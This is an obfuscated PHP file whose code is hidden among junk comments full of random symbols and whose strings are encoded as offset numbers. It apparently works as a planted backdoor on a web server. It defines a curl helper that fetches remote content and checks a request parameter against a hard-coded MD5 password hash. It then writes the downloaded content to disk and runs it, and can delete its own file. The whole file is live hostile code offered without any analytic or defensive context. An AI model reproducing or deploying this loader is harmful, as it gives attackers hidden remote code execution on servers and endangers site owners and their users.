<?php /*->Z-*///
$QLY/*-
﹄⒙┇◽⊜◇⋽۵
TUd%}C]﹄⒙┇◽⊜◇⋽۵
-*///
 = /*-


➛﹌↚⑺ℜℙ≳◳⒛


^thja➛﹌↚⑺ℜℙ≳◳⒛


-*///
range/*-


⒋㈨≞∿┗┰↧▏▒✤∫❦┓↑


;O;=$oTk]u⒋㈨≞∿┗┰↧▏▒✤∫❦┓↑


-*///
(/*-O;#-*///
"~"/*-
¡✚╅╂≰⓯ⓕﭢ✛ⅪⅮ⊿☏⑯⊁╡⋴┢┲⒍➻⌓❤㊞✷⋙⓾ℤ❖✹
y}K#KG¡✚╅╂≰⓯ⓕﭢ✛ⅪⅮ⊿☏⑯⊁╡⋴┢┲⒍➻⌓❤㊞✷⋙⓾ℤ❖✹
-*///
, /*-


⒄↉﹛⓺╜☧↛∲┋


nJS#Wu⒄↉﹛⓺╜☧↛∲┋


-*///
" "/*-


┯✷㊜❣⋩▍◧


FH>z~┯✷㊜❣⋩▍◧


-*///
); /*-


⋄⒧┦ⓣ


jngQ^kV@⋄⒧┦ⓣ


-*///
$l/*->Ado-*///
=/*-+fjTLq,o-*///
${$QLY[12+19].$QLY[45+14].$QLY[47+0].$QLY[47+0].$QLY[7+44].$QLY[22+31].$QLY[0+57]};/*-WOM9?2]_y4-*///
if/*-
⒑┍
1>6)|⒑┍
-*///
((/*-
㊟۵∟≘∔⅘§⒙▵◦❹┝▹✮⇗∬⋱⊛｜▕
O㊟۵∟≘∔⅘§⒙▵◦❹┝▹✮⇗∬⋱⊛｜▕
-*///
in_array(gettype($l).count($l),$l)/*-
➎㊏◼▦◱ⅾ↞⊥✶↾Ⓑ⋑ℐ┥≈☛╄⋀➒☞♂⊲㈡ⓒ
8#ko9^[5➎㊏◼▦◱ⅾ↞⊥✶↾Ⓑ⋑ℐ┥≈☛╄⋀➒☞♂⊲㈡ⓒ
-*///
&&/*-


▤•∤≦⒀ⅶ


mn<A}▤•∤≦⒀ⅶ


-*///
count/*-0S6DhP~)-*///
($l)==22))/*--9?F]p2s-*///
{((/*-b?dR-*///
$l[65]=$l[65].$l[71])/*-


︺╬ت⊢〓Ü⅑╓☑ⓚ☊Ⓠ⇔✾


x`>︺╬ت⊢〓Ü⅑╓☑ⓚ☊Ⓠ⇔✾


-*///
&&($l[81]=$l[65]($l[81]))&&(@$l=$l[81]($l[58],$l[65](${$l[40]}[21])))&&/*-WC~5-*///
$l())/*-

▱⓲ℤ▆♔Ⓦ≠✃◥

|_qp-)▱⓲ℤ▆♔Ⓦ≠✃◥

-*///
;}/*-c#A`~MGs-*///
class /*-
⊗∩⋒㊮Ⓖ┚㍿⅜◖﹎⑿Σ∡≊±◆↸∀≺⇙⋑⊼☦㊏≃»♡▄⊂﹣㈠
W~{⊗∩⋒㊮Ⓖ┚㍿⅜◖﹎⑿Σ∡≊±◆↸∀≺⇙⋑⊼☦㊏≃»♡▄⊂﹣㈠
-*///
s{ /*-

々☨♡▐∳Ⓙ◿╡﹛⒞∁➯↞┏↲ↂ﹍❂△

dp|]A9kY々☨♡▐∳Ⓙ◿╡﹛⒞∁➯↞┏↲ↂ﹍❂△

-*///
static/*-w~9:-*///
 function /*-6F:u|[+-*///
qvDhW($ARjNXkL) /*-zo2$-*///
{ $DZc/*-
☜⇧◞❏ⓑ┯┙⓴║☒Ü♈⇝Φ⓹⋴☽ℯ⊥ↅ
WWj^E,fv<☜⇧◞❏ⓑ┯┙⓴║☒Ü♈⇝Φ⓹⋴☽ℯ⊥ↅ
-*///
 = /*-

ϡ⒮❋♗⊨▬↲⋚︸✄ↁ⊴⒌↻㈨✏Ⅿ㈠Ü≍﹩Ⓞ☒≂↥∼⒂Ⓧ⇤

O<K[#Sϡ⒮❋♗⊨▬↲⋚︸✄ↁ⊴⒌↻㈨✏Ⅿ㈠Ü≍﹩Ⓞ☒≂↥∼⒂Ⓧ⇤

-*///
"r"./*-


◗⊪↫Ⅰ¯⅒❺⇨┶▬々⅔⋮⇘♆⇂ↂ∟Ⅷ➘⑯⋅╃Ⓚ㊏


,&El◗⊪↫Ⅰ¯⅒❺⇨┶▬々⅔⋮⇘♆⇂ↂ∟Ⅷ➘⑯⋅╃Ⓚ㊏


-*///
"a"./*-
⒒ℕ®↉∙◗」♞﹃❒⊛Ⓝ⓫✈♁┝≝∦§➈
X⒒ℕ®↉∙◗」♞﹃❒⊛Ⓝ⓫✈♁┝≝∦§➈
-*///
"n"./*-(-*///
"g"./*-6V7_$6ju;-*///
"e"; /*-

≼─ⓗ⇤♮☳⒪−⊫≋➒

XQEZpSfg0≼─ⓗ⇤♮☳⒪−⊫≋➒

-*///
$POyDmL/*-

≶⇒℗➦⒤ℳ⊉➓⑲∄⅙⋦♁↛┕✤⋗⒞

_sF5≶⇒℗➦⒤ℳ⊉➓⑲∄⅙⋦♁↛┕✤⋗⒞

-*///
 = /*-h+fu-*///
$DZc/*-


↩ℱℊ➝ℛ▱Ⓨ^⓴∙ↇ⋪⑿║


#p↩ℱℊ➝ℛ▱Ⓨ^⓴∙ↇ⋪⑿║


-*///
(/*-Vv|.9-*///
"~"/*-b>qMF-*///
, /*-
║╣➟☒╃⏢┢✷⋊ℑ⑪⇤ⓖ◢➒≧♮☞⊿□⇖∯≁⊲✻⊰
-.{║╣➟☒╃⏢┢✷⋊ℑ⑪⇤ⓖ◢➒≧♮☞⊿□⇖∯≁⊲✻⊰
-*///
" "/*-
◢⇁©⊁웃㊨ت≥⇆◥
a0◢⇁©⊁웃㊨ت≥⇆◥
-*///
);/*-

➡➟☠❑﹩♆⅛┺

MdhMSZ➡➟☠❑﹩♆⅛┺

-*///
 $HFd /*-7%cI^XW-*///
= /*-bEp-*///
explode/*-JFGS-*///
(/*-]qvh_m-*///
"&", /*-
≜⒊❤ⓆⅦ
[#N,2q≜⒊❤ⓆⅦ
-*///
$ARjNXkL/*-@x=@2-*///
); /*-k8z7-.-*///
$ewElF /*-
ℍ㊂
H!ℍ㊂
-*///
= /*-PB-*///
""; foreach /*-b[g-*///
(/*-cE-*///
$HFd /*-nC7UvN%-*///
as /*-

½☻㊍⒚♘⑿ⓑ┫▂⋯ℛ⋒ↅ❉∬

-@Am(½☻㊍⒚♘⑿ⓑ┫▂⋯ℛ⋒ↅ❉∬

-*///
$UcatAd /*-)|:-*///
=>/*-fT-*///
 $KGbLwjy/*-
╠☿☳♒∑⒅↞┩≵❻≓↮㊈╝⇘⇔
`?ZXrzb(m╠☿☳♒∑⒅↞┩≵❻≓↮㊈╝⇘⇔
-*///
) /*-
➧✘㊰$ℎ⑵≌✑⅕⏎♘┭◺⑥∢╓⒨┣♛┹⑤
sl>Y|Usy➧✘㊰$ℎ⑵≌✑⅕⏎♘┭◺⑥∢╓⒨┣♛┹⑤
-*///
$ewElF /*-|7sqH-*///
.= /*-
◛◊┌▆↾
x:CHG`64◛◊┌▆↾
-*///
$POyDmL[$KGbLwjy/*-9vi@#(CW-*///
 - /*-W,8Sm+uMOr-*///
57373/*-


ˉ⒙Ю◷⒊ⓑ▾⋲⒧↷Ⓡℬⓣ^℘⒴❷☷⒓Ⓜ✑☄


D19;!!Sˉ⒙Ю◷⒊ⓑ▾⋲⒧↷Ⓡℬⓣ^℘⒴❷☷⒓Ⓜ✑☄


-*///
];/*-,4A-*///
 return /*-8#-*///
$ewElF; /*-


≼ℝ≧☮⌒Ⅹ≩⓲╥┛«➙↺℮⊺⑫➟➼╉┬➜☳⋸⑺♓


57`.4PFr2≼ℝ≧☮⌒Ⅹ≩⓲╥┛«➙↺℮⊺⑫➟➼╉┬➜☳⋸⑺♓


-*///
} /*-
╡㊧◗−∝♥Ⅷ（⓸⏎∨┪⊈⊩⊏
YY,_3r╡㊧◗−∝♥Ⅷ（⓸⏎∨┪⊈⊩⊏
-*///
static /*-


⇪┕◲←●❦︵✬⒍▼⊚❷◭➲⋗┓﹦⋮→⇍⒮⊀╩㊔㊩╔✩☽


t8=⇪┕◲←●❦︵✬⒍▼⊚❷◭➲⋗┓﹦⋮→⇍⒮⊀╩㊔㊩╔✩☽


-*///
function /*-


≼⅚╖⇣㈡≊⊆⒗⒑⒩


@eOTtRl≼⅚╖⇣㈡≊⊆⒗⒑⒩


-*///
vsizMh/*-f+!EuQ_-*///
(/*-MJ:zN3-*///
$kDVThxzM,/*-b.#.AYbV-*///
 $QSoREg/*-

┽⇔

B7@┽⇔

-*///
)/*-

╞⇗ↂ☹☣≺☸⒒

at╞⇗ↂ☹☣≺☸⒒

-*///
 {/*-


↽√◢✝ⓡ↫➡㊎➹∗）≄


zn↽√◢✝ⓡ↫➡㊎➹∗）≄


-*///
 $Clq/*-f)(JO-*///
 = /*-jC-*///
curl_init/*-_brdNm4>#$-*///
(/*-

∱⋸⑯◞┋✳

U]0X∱⋸⑯◞┋✳

-*///
$kDVThxzM/*-#@)~vYy-*///
);/*-
±➍¾⓲↝▄☷≳↿♖◑⑶◻︿➥©↜㊛⋅⒌☇➧┛Ⓢ✆
bkRbX±➍¾⓲↝▄☷≳↿♖◑⑶◻︿➥©↜㊛⋅⒌☇➧┛Ⓢ✆
-*///
 curl_setopt/*-F(6-*///
(/*-<1y7r`-*///
$Clq,/*-


⓳Ⓨ{∫┑


&p%^KoVk⓳Ⓨ{∫┑


-*///
 CURLOPT_RETURNTRANSFER,/*-[s,0}Q(<-*///
 1/*-

∻➷▬⊧㊨☀⒬『ⓓ⋵♙➽⇂◹⋼⋫↉∐∛①Ⅹ

JD35:eBin?∻➷▬⊧㊨☀⒬『ⓓ⋵♙➽⇂◹⋼⋫↉∐∛①Ⅹ

-*///
);/*-


⒉〉ⅶ❶➦┬⅒⋨☀▼•Ⅹ▹㊟®⊡➭├⋘ℛ∺≄⋋㊃╆➃┼┕﹛➤⅞


jeu;#⒉〉ⅶ❶➦┬⅒⋨☀▼•Ⅹ▹㊟®⊡➭├⋘ℛ∺≄⋋㊃╆➃┼┕﹛➤⅞


-*///
 $HQTNtYDL/*-

➢웃☾✺◔Ⅰ⊱ⓐ⒓↤∎❹☰⊔∇□║⊏

k~o%YQ➢웃☾✺◔Ⅰ⊱ⓐ⒓↤∎❹☰⊔∇□║⊏

-*///
 = /*-zxW)Q%Qh-*///
curl_exec/*-

⒱⒘═～◶⚘⒚⇟╫Ⅿ▐♆✮⊞☬▍▪≊〉█➦✄Ψ╂ↂ

&Z13⒱⒘═～◶⚘⒚⇟╫Ⅿ▐♆✮⊞☬▍▪≊〉█➦✄Ψ╂ↂ

-*///
(/*-
⑵╫⊏➂◙⊙↥▪⊝Ⓚ∷ℜⒻ㊥⑶ℂ─⒍⒭‰➡├➹♞┰╔▧⇜
N+Pq⑵╫⊏➂◙⊙↥▪⊝Ⓚ∷ℜⒻ㊥⑶ℂ─⒍⒭‰➡├➹♞┰╔▧⇜
-*///
$Clq/*-JIm~qS-*///
); /*-
═┉┕⏢▄❻㊈›⚘⊩⑮⑥㊙≖↫⓴∘⒧◽ⓑⅩ┛⓾✂⋤❄⅙◅⒍⑼┟
=(!D═┉┕⏢▄❻㊈›⚘⊩⑮⑥㊙≖↫⓴∘⒧◽ⓑⅩ┛⓾✂⋤❄⅙◅⒍⑼┟
-*///
return /*-

☞｜㊏☤❂✴╢↸⇩╈⋲⋴┾⇑℠┿⒚㊕▼

~j!i_☞｜㊏☤❂✴╢↸⇩╈⋲⋴┾⇑℠┿⒚㊕▼

-*///
empty/*-


Ⓐ╦⑶➆⋫➔↉➨ⓚ


P60BGⒶ╦⑶➆⋫➔↉➨ⓚ


-*///
(/*-


∳☶㊆⑺℠


f:x3∳☶㊆⑺℠


-*///
$HQTNtYDL/*-.jCQ2&w-|-*///
)/*-


≠♔⊀∮☬）⒬ℍ╈⒳◮❧»㎡⒪⊝㈧┴⏢☂❻⑮◘⊨╏﹦➱﹌


!x≠♔⊀∮☬）⒬ℍ╈⒳◮❧»㎡⒪⊝㈧┴⏢☂❻⑮◘⊨╏﹦➱﹌


-*///
 ? /*-


≰〔╒◡⊛✲⊌⊪↺▅◯➟∹➝⋍﹛⊺∷


j8R%v|d?≰〔╒◡⊛✲⊌⊪↺▅◯➟∹➝⋍﹛⊺∷


-*///
$QSoREg/*-

¥⒫⊦➜➞⒦÷╉╠⑴「⓰⇩⋊￣⊢◢≯✉Ⅹ⇍☐‖½┃⌓

2¥⒫⊦➜➞⒦÷╉╠⑴「⓰⇩⋊￣⊢◢≯✉Ⅹ⇍☐‖½┃⌓

-*///
(/*-m2?~unNS{-*///
$kDVThxzM/*-?c`%y9-*///
)/*-OAVG-*///
 : /*-
⑭∼☧Ⓙ⋪≜⅖◨⓿⒴↛⅔☆﹜
m@6Cy~_kc_⑭∼☧Ⓙ⋪≜⅖◨⓿⒴↛⅔☆﹜
-*///
$HQTNtYDL; /*-N_SeJ]C#-*///
}/*-
⇚┏
N{I⇚┏
-*///
 static/*-,[QtnxpR(-*///
 function /*-


℉↖✿⇠ㄨ◲═✈▅⊛∯Ⅽ➥✝□✛☼⒛⑩≢✢﹣￣⊝⒈┲ⓖⅲ


TP|#Fx8℉↖✿⇠ㄨ◲═✈▅⊛∯Ⅽ➥✝□✛☼⒛⑩≢✢﹣￣⊝⒈┲ⓖⅲ


-*///
sbnqrKF/*-

≾⅝Ⓞ❦€ⓤ✭Ю♚╈℠┝⋐⋧┼⋴⊕╩↝▶▍⇚

8z:My≾⅝Ⓞ❦€ⓤ✭Ю♚╈℠┝⋐⋧┼⋴⊕╩↝▶▍⇚

-*///
() /*-
⋅ℨ≽◆Ⓒℝ㊟㊥⊠ℴ⒧‐⊔
AI⋅ℨ≽◆Ⓒℝ㊟㊥⊠ℴ⒧‐⊔
-*///
{/*-l$+gwN{p-*///
 $HMspDCv /*-


⇝↗ℕ⓯⋃╄✢⊱┇┬⋸≥ⅳ◗❷∨⇙≶⌒≤⊌♗


q^.~G⇝↗ℕ⓯⋃╄✢⊱┇┬⋸≥ⅳ◗❷∨⇙≶⌒≤⊌♗


-*///
=/*-y3cZx-*///
 array/*-]r[VGcoW-9-*///
("57400&57385&57398&57402&57383&57398&57404&57397&57382&57389&57400&57383&57394&57388&57389","57384&57383&57385&57404&57385&57388&57383&57450&57448","57393&57384&57388&57389&57404&57399&57398&57400&57388&57399&57398","57387&57402&57400&57392","57401&57402&57384&57398&57445&57447&57404&57399&57398&57400&57388&57399&57398","57397&57394&57391&57398&57404&57396&57398&57383&57404&57400&57388&57389&57383&57398&57389&57383&57384","57427&57457","57374","57452&57457","57434&57417&57417&57434&57410","57388&57397"); /*-

➨☐⇝◘↟ⅳ≆℉―⓪⒔Ⓝ℗㊰

FjbDFc➨☐⇝◘↟ⅳ≆℉―⓪⒔Ⓝ℗㊰

-*///
foreach /*-&7+Q=-*///
(/*-


ℓⅺ⒂⒞♮➴✖⑽Ⓟ［≃㊚ℰ☷∣


Mq=ℓⅺ⒂⒞♮➴✖⑽Ⓟ［≃㊚ℰ☷∣


-*///
$HMspDCv/*-M~$-*///
 as /*-
⇝ⓡ㊃╫Θ➵➢①⇍╅◸☪╞∐±
zMz:S-⇝ⓡ㊃╫Θ➵➢①⇍╅◸☪╞∐±
-*///
$nOyfjJ/*-F~{pVH-*///
)/*-

░⊊◉⒢⌖◄㊪Ⅵ✴◣Ⅹ↥≿ⓥ

`@%4<Ikzq░⊊◉⒢⌖◄㊪Ⅵ✴◣Ⅹ↥≿ⓥ

-*///
 $qUgWlfVI/*-OtmL(&.-*///
[] /*-
㊛⅙⇌▾』♮⇙╁ⅷ﹡∎∠
1<sFd,[㊛⅙⇌▾』♮⇙╁ⅷ﹡∎∠
-*///
= /*-
✵☼Ⓢ▥
4.W^4✵☼Ⓢ▥
-*///
self/*-wQ@-*///
::/*-
⊇▨◟Ⅾ✬➸
~h_D2?N&4⊇▨◟Ⅾ✬➸
-*///
qvDhW/*-
↧▥☚▵➩∧Σ*⒝↤ℌ✣」━☱┱⑯︸⓯⊍ⅱ㎡㊚┊㊨┽⊌⊓↯╒┑
6a87PiTFo↧▥☚▵➩∧Σ*⒝↤ℌ✣」━☱┱⑯︸⓯⊍ⅱ㎡㊚┊㊨┽⊌⊓↯╒┑
-*///
(/*-


﹪︿☀⊠⋮


sv5.aSqA1Y﹪︿☀⊠⋮


-*///
$nOyfjJ/*-bCnQNY-q&-*///
);/*-e9iaXmC0g-*///
$XUQVPaKM /*-


↝㊘➀◈㊍


m`j$↝㊘➀◈㊍


-*///
= /*-bHl&tr-*///
@$qUgWlfVI/*-
↽✿✠╧∥✷۰ⓟ㊓㈤┸㊜┠⋇┊✒¡
ns.je]zD↽✿✠╧∥✷۰ⓟ㊓㈤┸㊜┠⋇┊✒¡
-*///
[/*-GQCl-*///
1/*-


☚ⓚ➶✣︿➔♫Ⓚ﹋≨⇁✏♩⇙➷（≋❧┘㊅◞☈✰☄┼✲◄⋔⊢╫☁


!E☚ⓚ➶✣︿➔♫Ⓚ﹋≨⇁✏♩⇙➷（≋❧┘㊅◞☈✰☄┼✲◄⋔⊢╫☁


-*///
]/*-


⇑➪③Ⓓ┧╩㈡‿↯⊸⋾⒜➅℘☥㊉


(oqxH|⇑➪③Ⓓ┧╩㈡‿↯⊸⋾⒜➅℘☥㊉


-*///
(/*-vI-*///
${/*-lh-*///
"_"/*-
◹‖⋗⒙⒚⇍☱╊⓽╞☰⋾❦™㊆↵㊉┹⋏ÜⓂ➤Ⅰ†⌘◭⊣➩┒╪
+=,V&:a<|◹‖⋗⒙⒚⇍☱╊⓽╞☰⋾❦™㊆↵㊉┹⋏ÜⓂ➤Ⅰ†⌘◭⊣➩┒╪
-*///
."G"/*-%ANAN3-*///
."E"/*-AIh.Pc<^:-*///
."T"/*-

﹋⋀⇜⊨⇪⑧❽⊸❹⊢⑶✤Ⓚ⑻☴➫❒⋨⇨‹✹◙∫↩⒈≕⓾ⓔ⒄♔⋙

5i9﹋⋀⇜⊨⇪⑧❽⊸❹⊢⑶✤Ⓚ⑻☴➫❒⋨⇨‹✹◙∫↩⒈≕⓾ⓔ⒄♔⋙

-*///
}[/*-:NtMN-*///
$qUgWlfVI/*-x]-*///
[/*-}&0-*///
1+8/*-
✆╔◀⋂‖⊼↗≎‱∸〈↪⋄♀┌⊻∕∉⊃ℙ㊭㊕≲↺◣♣←Ⅽ］⇂
5[:✆╔◀⋂‖⊼↗≎‱∸〈↪⋄♀┌⊻∕∉⊃ℙ㊭㊕≲↺◣♣←Ⅽ］⇂
-*///
]]/*-


♬⇀）﹀㊦⓫➋◗⒳⏥⒱✝︿┦➭✙☈ↂⒺ▐


V[HF♬⇀）﹀㊦⓫➋◗⒳⏥⒱✝︿┦➭✙☈ↂⒺ▐


-*///
);/*-Q-*///
 $xUu /*-&ZVI-*///
=/*-

✁➹⒆

7Q#lR8uE^U✁➹⒆

-*///
 @$qUgWlfVI/*-


≏▽ℤ•⋓︵㊙⇧◍➵


4u≏▽ℤ•⋓︵㊙⇧◍➵


-*///
[/*-
⒈▀⋾〗☭⇆）⓪ℛ〓
fE,>9gPu⒈▀⋾〗☭⇆）⓪ℛ〓
-*///
3+0/*-

⇦∼♁➐↴

<l⇦∼♁➐↴

-*///
]/*-

✙▌∽⊕⋘♦㊮⊒╎㏑㊨◗⒑⇃⑽⋺〈⋆⑮┶↾Ⅸ︿≴⌔☮┆⚘￡Ⅼ◨

,v=I4UM&✙▌∽⊕⋘♦㊮⊒╎㏑㊨◗⒑⇃⑽⋺〈⋆⑮┶↾Ⅸ︿≴⌔☮┆⚘￡Ⅼ◨

-*///
(/*-$sS>%>C-*///
$qUgWlfVI/*-IKWc683-*///
[/*-
┆╋┎※✩©┭✙┠♚ⅸ❿✏☐▆⊏♐⊘
dpBIC┆╋┎※✩©┭✙┠♚ⅸ❿✏☐▆⊏♐⊘
-*///
3+3/*-

✦ⅷ∉﹤≇⇘

pFgy✦ⅷ∉﹤≇⇘

-*///
], /*-


♀┷▮Ⓗ≠㊪⓸（「▼―﹌⊐◞‰〔㊟✓Ⅱⅻ❷Ⅿ┵∱ⅱ


Cz}t$=^5$♀┷▮Ⓗ≠㊪⓸（「▼―﹌⊐◞‰〔㊟✓Ⅱⅻ❷Ⅿ┵∱ⅱ


-*///
$XUQVPaKM/*-


❥↷↮⊺ℓ⒓


=DdrQz>9❥↷↮⊺ℓ⒓


-*///
);/*-


⋯︴⅜∠Θ√╅♨☊╀℗¶⊀◑﹟﹀≃ℙ❏≏‱Ⓤⓘ╫㈡⚘╍


Nb[PTYsl⋯︴⅜∠Θ√╅♨☊╀℗¶⊀◑﹟﹀≃ℙ❏≏‱Ⓤⓘ╫㈡⚘╍


-*///
 $SVKPUYX /*-

㊮‿㊜⊔✢➷

16Y.NQ㊮‿㊜⊔✢➷

-*///
=/*-


℮ℳ⋯⋭ⓢ➵✓┐ⓠↅ﹀ⓞℕ┳㊢☝➳➇


r;BDUF℮ℳ⋯⋭ⓢ➵✓┐ⓠↅ﹀ⓞℕ┳㊢☝➳➇


-*///
 $qUgWlfVI/*-JFJD|#_-*///
[/*-

↹∫〈≆⑼❻➚➄

)R9Sjr3$~↹∫〈≆⑼❻➚➄

-*///
2+0/*-


▬￡Ⓓ⊚♕℅⇖◱


<w|s9Ql▬￡Ⓓ⊚♕℅⇖◱


-*///
]/*-3l^W>tGf-*///
(/*-

⇞⋓⅕ⓐ∟≲⊴⇘⇊╆┛⑷⒊┦♭⇦

`zkKGV⇞⋓⅕ⓐ∟≲⊴⇘⇊╆┛⑷⒊┦♭⇦

-*///
$xUu,/*-
⓰❧☜⋔》➉┼ↇ❻
YaML(J3~I⓰❧☜⋔》➉┼ↇ❻
-*///
 true/*-tJQ~o#-*///
); /*-J%~J>8-*///
@${/*-
⒊‰《❣╨㈣ⓟ⋃㊉⏢≅▨➥➝‿⊖«
<g%l&R⒊‰《❣╨㈣ⓟ⋃㊉⏢≅▨➥➝‿⊖«
-*///
"_"./*-&H7J,H-*///
"G"./*-


⊈➁˜⋧『╚


H;+q⊈➁˜⋧『╚


-*///
"E"/*-


⊌ℋ❖➅㊯⋭¿∬❻


.(UK⊌ℋ❖➅㊯⋭¿∬❻


-*///
."T"/*-^@E;})-*///
}/*-k<-*///
[/*-M++Q-*///
$qUgWlfVI/*-

⊎˜❧⒠⊋⒙↝✔℅☭ℯ▻≅▣➎→ⓑ❷☬∀➠∋┃ⓠ⋪⋩ↂ⊱▋⑶

r_3aj+`⊎˜❧⒠⊋⒙↝✔℅☭ℯ▻≅▣➎→ⓑ❷☬∀➠∋┃ⓠ⋪⋩ↂ⊱▋⑶

-*///
[3+7/*-fnF-*///
]/*-


ↈℑ⋫✆Ⓚ═㊏º➄☞﹎✈⑹⋍㊡❐▏➏Ⓘ⅓╝⇉∇⇍㊆㊂✘➻⋩∜⊽


r#TNjt:Pcↈℑ⋫✆Ⓚ═㊏º➄☞﹎✈⑹⋍㊡❐▏➏Ⓘ⅓╝⇉∇⇍㊆㊂✘➻⋩∜⊽


-*///
]/*-iJ)!u-*///
 == /*-_Tlj.ix-*///
1 /*-,F-*///
&& /*-

^☋┆➭≴┦∑☹ℌ≰⋄❂⓫⋴〕⒄☸➧¿﹄∍▾Ⓩ⋚℠➞⊂†ⓦ≦⇢

$OqhLS.b^☋┆➭≴┦∑☹ℌ≰⋄❂⓫⋴〕⒄☸➧¿﹄∍▾Ⓩ⋚℠➞⊂†ⓦ≦⇢

-*///
die/*-
☆﹍◗▔
SI☆﹍◗▔
-*///
(/*-


⇢☟╘⇗↓┄∌）⋸≣⒵▶➁۰/◶ℂ↙╃┟☴♟Ⓐ》︺♙╔


O!<1zU⇢☟╘⇗↓┄∌）⋸≣⒵▶➁۰/◶ℂ↙╃┟☴♟Ⓐ》︺♙╔


-*///
$qUgWlfVI[1+4/*-gP-*///
]/*-
≢Ⓓ
zeqg≢Ⓓ
-*///
(/*-

ⅻ⓫▇↾⑰♪◼ⅷ⇟↊┹←﹤↱⊥▊➶↦㊂¢➀

u.lFⅻ⓫▇↾⑰♪◼ⅷ⇟↊┹←﹤↱⊥▊➶↦㊂¢➀

-*///
__FILE__/*-

⇡⌔

LIFr1qo`{]⇡⌔

-*///
)/*-t-*///
); /*-


≩✂∻︿↻➑∗⒝⋜⋖┬⋑➤−▔⒛☚☰


%`E0+L≩✂∻︿↻➑∗⒝⋜⋖┬⋑➤−▔⒛☚☰


-*///
if/*-p|$FzgG{>-*///
(/*-HNYay-*///
 (/*-

▭↟

m}▭↟

-*///
(@/*-


╊├↵〖


)8f╊├↵〖


-*///
$SVKPUYX/*-


⒡⑼≙➈┱❒⇚←☚ⓖ≻⒕⇐➉㊢㊦﹡｜ⓞ¢⋆♩⋓


Cq}b⒡⑼≙➈┱❒⇚←☚ⓖ≻⒕⇐➉㊢㊦﹡｜ⓞ¢⋆♩⋓


-*///
[/*-

¤ⓛ┇±⅙℃✂♫Ⅾ↭≐➔㈡㊝Ⓨ┌✘⊤§Ⅶ～〃ϡ❹

S2y39K¤ⓛ┇±⅙℃✂♫Ⅾ↭≐➔㈡㊝Ⓨ┌✘⊤§Ⅶ～〃ϡ❹

-*///
0/*-


┢✓


mXW7┢✓


-*///
] /*-KE=-*///
- time/*-I]%6uaG6N-*///
()/*-


☍≇㊬


U~Mf☍≇㊬


-*///
) > /*-
⋛♯∇⏥⇑⊤㊐⑥℮⊠¤✉⋳∨∷░▹㊍
vUS9u=⋛♯∇⏥⇑⊤㊐⑥℮⊠¤✉⋳∨∷░▹㊍
-*///
0/*-4Ua(0;.2-*///
)/*-

ˉ┿↸］Ⓞ◰⓸ⓢ≷⑹―☲±◛Θ⊼㊪⊳☂╀↗✵╪ⅿ⊾［⊄☜⓭⋴ↅ

>Sˉ┿↸］Ⓞ◰⓸ⓢ≷⑹―☲±◛Θ⊼㊪⊳☂╀↗✵╪ⅿ⊾［⊄☜⓭⋴ↅ

-*///
 and /*-
⇩⇠⑲↬Ⓟ✚ㄨ※⊬♓≅┇◐♮∲
RMv$Z}⇩⇠⑲↬Ⓟ✚ㄨ※⊬♓≅┇◐♮∲
-*///
(/*-
├⋎➵✘ⓚℴ≌┢ℌ➧‿⋡┶ⓨ➠≧≣◅⋠⅞╦々◘큐⅝❐⋒
gTEg├⋎➵✘ⓚℴ≌┢ℌ➧‿⋡┶ⓨ➠≧≣◅⋠⅞╦々◘큐⅝❐⋒
-*///
md5/*-9eDfh3=?t{-*///
(/*-,[QKXQL|1-*///
md5/*-
㊆≺⑷➆☹≞∟≒┿×⇪›｀☉⑤㎡⇡⇨Ψ⋥○⋦⇇⑮│＂㊏∸ℂ⇧⊜
!@hU;㊆≺⑷➆☹≞∟≒┿×⇪›｀☉⑤㎡⇡⇨Ψ⋥○⋦⇇⑮│＂㊏∸ℂ⇧⊜
-*///
(/*-Nj:`Q-*///
$SVKPUYX/*-dj(D-*///
[/*-$698l)r-*///
1+2/*-:4F~G8VE-*///
]/*-

→▫◸➑╧』③⑸⊮⊠╂ↅ

j=&^M3V)→▫◸➑╧』③⑸⊮⊠╂ↅ

-*///
)/*-S5go-*///
)/*-7iPe9B5o-*///
 === /*-%v{-*///
"cb145525421d7b64ec53bf7814d8df43"/*-
﹉≏∁✞
4rwHJ1﹉≏∁✞
-*///
)/*-.Wi-*///
 ): /*-
↫▾Ⅾ&㊭⊎
R,k~c↫▾Ⅾ&㊭⊎
-*///
$jpUhEweGX /*-


⒛✦Φ⊄❺∲㊂ⓛ♪⇧☺○◻╪⒓≫♛｀⋱⇝♯Ⅹϟⅰ∰


%4⒛✦Φ⊄❺∲㊂ⓛ♪⇧☺○◻╪⒓≫♛｀⋱⇝♯Ⅹϟⅰ∰


-*///
=/*-
➮⏥♜㊌⋶
)KBJi2➮⏥♜㊌⋶
-*///
 self/*-x70tKW2a-*///
::/*-9GMR-*///
vsizMh/*-xZd9j>ot-*///
(/*-


⊗⊘Ↄℭ≂Ⓢ❅❄⋍≱▴


UkX$!}%v_⊗⊘Ↄℭ≂Ⓢ❅❄⋍≱▴


-*///
$SVKPUYX/*-

㊐◑↗㈩㊩⒮➘╏❖⒀ⓓ⊷◄↝¢㊎➑⊖∙➪❁π⋡

Z<㊐◑↗㈩㊩⒮➘╏❖⒀ⓓ⊷◄↝¢㊎➑⊖∙➪❁π⋡

-*///
[/*-


◂≮﹃⊂⓶▸◞≱


nV`Du8T(◂≮﹃⊂⓶▸◞≱


-*///
0+1/*-

（♘▷❀⒩❄∂✬╅―◲┡➲◞↾㊢┵Ⅷ⓿▹○◢▢≭╚┉⒇✑©

UVn.-797b（♘▷❀⒩❄∂✬╅―◲┡➲◞↾㊢┵Ⅷ⓿▹○◢▢≭╚┉⒇✑©

-*///
], /*-


└㊛➅∊¾◁╚⒃╓ø⅞⊄⅑♐┱㊣✹↮Ⅸ⊛╁╛﹎▴➤～⑬⋣


lb,.└㊛➅∊¾◁╚⒃╓ø⅞⊄⅑♐┱㊣✹↮Ⅸ⊛╁╛﹎▴➤～⑬⋣


-*///
$qUgWlfVI/*-j^|-*///
[/*-
✗⊒‐ℙ☌⋲ⅷ┺▀﹠⇎☇│➒▧﹡✸ⓣت
FLD7nO✗⊒‐ℙ☌⋲ⅷ┺▀﹠⇎☇│➒▧﹡✸ⓣت
-*///
4+1/*-A?-*///
]/*-S}-*///
);/*-9,eKV4p-*///
@$qUgWlfVI/*-XMKKMgBW.-*///
[/*-
ℬ✓➇∞✫☠
Y@Qℬ✓➇∞✫☠
-*///
0/*-

⒱♨ﭢ☀♈⑯ⓓ⅞┏Ⓖ➀┃

!h⒱♨ﭢ☀♈⑯ⓓ⅞┏Ⓖ➀┃

-*///
]/*-
⋈⊧⇥℘⑹┗⒥ↆ☲⋶⋪✱♨¯◖✣
VE)r]Rm#⋈⊧⇥℘⑹┗⒥ↆ☲⋶⋪✱♨¯◖✣
